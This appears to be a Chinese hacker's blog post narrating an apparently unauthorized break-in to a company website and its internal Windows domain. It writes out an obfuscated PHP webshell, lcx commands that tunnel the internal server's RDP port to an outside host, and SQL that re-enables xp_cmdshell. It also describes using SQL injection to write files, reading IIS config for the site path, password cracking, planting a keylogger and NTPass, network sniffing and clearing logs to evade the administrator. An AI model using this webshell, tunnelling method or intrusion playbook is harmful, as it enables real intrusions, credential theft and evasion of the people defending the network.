先对目标站进行信息收集:扫了下目录,iis6,发现了后台,并且存在目录遍历:

图片1.png

图片2.png


存在目录遍历我寻思着找点有用的东西,看看有没有前人留下的脚印啥的,直接踩上去多方便,但是翻了一半天无果。从前台找找有没有有用的东西,发现新闻更新的挺勤的,说明管理员还是经常上线,想着x点cookie,结果找遍了都没有发现可以x的地方。

图片3.png



结果惊喜发现存在sql注入:


图片5.png




做到了这里,心想这个站还不轻松拿下么??感觉shell已经在向我招手啦,用sqlmap跑起来:


图片6.png



解出Md5,前边已经得出了后台地址,于是转至后台拿shell,然后添加产品传图片


图片7.png




几番测试,发现是白名单过滤,考虑用iis6的解析漏洞来搞,但是,传上去会被重命名:

图片8.png




bursuite抓了一下包试试,截断一下也不管用,感觉拿shell陷入困境。

整理了下思路,这个网站有注入点,是Php+mysql+iis6这样的结构,有后台地址,存在目录遍历,后台拿shell是失败了,但是前台拿shell呢?但是前台写shell需要满足三个条件,一个是权限,一个是转义函数是否开启,一个是网站物理路径。于是测试了一下,发现是dba权限:

图片9.png



好了,现在我们权限有了。然后也发现了魔法转义函数并没有开启:

图片10.png



那么第三个问题来啊了,网站物理路径上哪里去找?这是个很头疼的问题,大多数时候都是通过报错来找,但是很可惜这个网站报错爆不出物理路径,想通过目录遍历来翻找,但是也还是找不到。这个时候我注意到了这个网页服务器是iis6,而不是apache,突然想起来iis的配置文件c:\windows\system32\inetsrv\MetaBase.xml 中很可能保存着网站的物理路径,于是用load_file()函数来读一下试试:


图片11.png



OK,成功找出网站物理路径,下一步就是写shell,感觉用手工要方便的多,于是直接用手工吧:


图片12.png




可是....这个结果也是让我大吃一惊...居然没写进去!!难道是我手残语句不对??那我用工具好了,祭出sqlmap,然而也没写进去:


图片13.png




我擦....神器都写不进去还玩个毛....感觉写shell没希望了。不行,不能放弃,我就不信写不进去,突然想起穿山甲也有个写shell的功能,只要有一丝希望就不能放弃!,于是乎掏出了灰尘扑扑的穿山甲:



图片14.png


图片15.png



哈哈哈,终于写进来了,真爽啊,然而.....当我访问的时候却出现:

图片16.png



我擦..这又是个什么情况..我是真的想骂人了哈,算了算了换个马得了,换个猥琐点的:<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> OK!Shell到手:



图片17.png


支持aspx,于是传个aspx的马上去看看:


图片18.png


不是system权限,得提权,结果执行tasklist /svc一看,360全套啊,不好整:



图片19.png



再收集收集点信息,结果竟让我让我发现了这个,嘿嘿,真是人品爆发了:


图片20.png


开着3389,可以考虑远程连接一下。


图片21.png


并且还存在域,可以试着玩玩内网:


图片22.png

图片23.png


这台机器的主机名叫webserver,在GAONENG这个域里,然后试着收集一下域用户管理,找找域控之类的信息:


图片24.png


我擦..这是个什么鬼..又试了很多东西,结果发现都是同样的症状,不管了,先连上3389再说吧,因为服务器在内网,直接连外网IP不行,所以只好通过lcx.exe转发出来,我的工具里面只有lcx不被杀了,为了避免被管理员发现,只能晚上偷偷的潜入:在外网IP上执行lcx.exe -listen 51 33891在内网服务器上执行 lcx.exe -slave 外网IP 51 127.0.0.1 3389然后在外网IP上远程连接127.0.0.1:33891就可以连上内网的3389了:


图片25.png


Ok,然后直接用administrator的账户和密码就登陆上去了,因为本地的用户不多,全在IIS侦探里面就能看到明文,所以就没有做导hash这个操作,但是密码太少,也不是件好事,然后把收集到的密码,包括windows密码和root密码,做成一个字典,然后挂在hscan上面扫一下弱口令:


图片26.png


结果仅仅只是扫出了两个弱口令,还有个sa权限的弱口令,并且129的这台机器还开了3389的端口,感觉有戏,就上连接器试试:结果发现xp_cmdshell被禁止了:



图片27.png


但是没关系,执行sql语句EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;开启就行,然后查看了一下权限,我勒个擦,竟然被降权了!!

图片28.png


感觉整个人都不好了,那估计是提权没辙了,但是可以搜集一下信息,继续查看:

图片29.png


诶,这跟webserver是在一个域里面,于是找找域控,看看这台机器上能不能搜集域信息:


图片30.png

图片31.png


OK,找到域控了,这下有了目标,对域控进行一番端口扫描后并没有发现什么有用的东西,只发现域控开了3389端口。现在整理了下思路,感觉手中收集到的密码不够多,并且装360的机器也蛮多的,也不好传东西上去,由于经验不足,所以想到的思路也很少,在这里卡了很久,最后实在没办法了,只能姜太公钓鱼——愿者上钩了:于是在webserver这台服务器上种了NTPass,看看能不能记录到域管理员的密码。然后又种了键盘记录器,因为他们内部有个网站,但是需要密码才能进,所以希望能记录到登录的密码。

最后装上了cain,实在没思路了才来嗅探,虽然很容易被发现(事实证明果然被发现了):

图片32.png



弄完这些,清理了日志就洗洗睡了,准备第二天上来看看成果,结果第二天醒来,用shell一看,我擦,东西给我删完了,键盘记录的文件也没了,cain也没了,只有个NTPASS的记录文件还在

图片33.png


但是啥都没记到,都是我自己登录的。准备连3389端口进去重新搞,结果悲催的发现他把3389的端口都给我关了:


图片34.png


感觉没戏了...只有默默的等待3389重开那一天.......